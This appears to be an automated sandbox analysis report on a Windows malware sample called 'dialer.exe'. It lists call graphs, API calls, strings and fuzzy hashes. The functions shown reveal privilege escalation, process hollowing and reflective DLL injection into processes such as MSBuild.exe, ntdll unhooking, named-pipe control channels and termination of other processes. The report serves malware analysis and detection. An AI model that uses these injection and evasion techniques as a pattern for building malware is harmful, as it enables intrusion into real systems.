GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap HeapFree GetProcessHeap HeapFree 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                          Callgraph

                          Executed Functions

                          Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                          • API String ID: 4177739653-1130149537
                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                          Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                          • API String ID: 2561231171-3753927220
                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                          Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                          • String ID:
                          • API String ID: 4084875642-0
                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                          Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                          • String ID:
                          • API String ID: 3197395349-0
                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                          Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                          • String ID: .text$C:\Windows\System32\
                          • API String ID: 2721474350-832442975
                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                          Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                          • String ID: M$\\.\pipe\dialerchildproc64
                          • API String ID: 2203880229-3489460547
                          • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                          • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                          Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                          • String ID: \\.\pipe\dialercontrol_redirect64
                          • API String ID: 2071455217-3440882674
                          • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                          • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                          Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                          APIs
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                          • String ID:
                          • API String ID: 3676546796-0
                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                          Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                          • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                            • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 000000014000163D
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                          • OpenProcess.KERNEL32 ref: 0000000140001859
                          • TerminateProcess.KERNELBASE ref: 000000014000186C
                          • CloseHandle.KERNEL32 ref: 0000000140001875
                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                          • String ID:
                          • API String ID: 1323846700-0
                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                          Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                          APIs
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$CloseHandleOpenWow64
                          • String ID:
                          • API String ID: 10462204-0
                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                          • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                          • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                          Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                          APIs
                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                            • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                            • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                            • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                            • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                          • ExitProcess.KERNEL32 ref: 0000000140002263
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                          • String ID:
                          • API String ID: 3836936051-0
                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
